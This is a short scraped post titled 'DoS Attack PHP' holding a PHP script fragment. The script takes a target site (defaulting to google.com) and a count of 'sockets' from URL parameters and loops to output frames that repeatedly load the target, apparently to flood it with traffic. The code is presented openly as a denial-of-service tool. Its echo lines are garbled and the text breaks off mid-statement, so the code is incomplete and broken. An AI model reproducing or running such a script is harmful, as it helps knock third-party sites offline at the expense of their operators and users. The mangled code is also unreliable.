Categorized | PHP

Tags :

DoS Attack PHP




< ?php
if(isset($_GET['refresh'])) {
echo "“;
}
?>



< ?php
$defSite = "http://google.com";
$defFrames = 6;
$defRefresh = 0;

if(!isset($_GET['sockets'])) {
$frames = $defFrames;
}
else {
$frames = $_GET['sockets'];
}
if(!isset($_GET['site'])) {
$site = $defSite;
}
else {
$site = $_GET['site'];
}

for($i = 1; $i <= $frames; $i++) {
echo "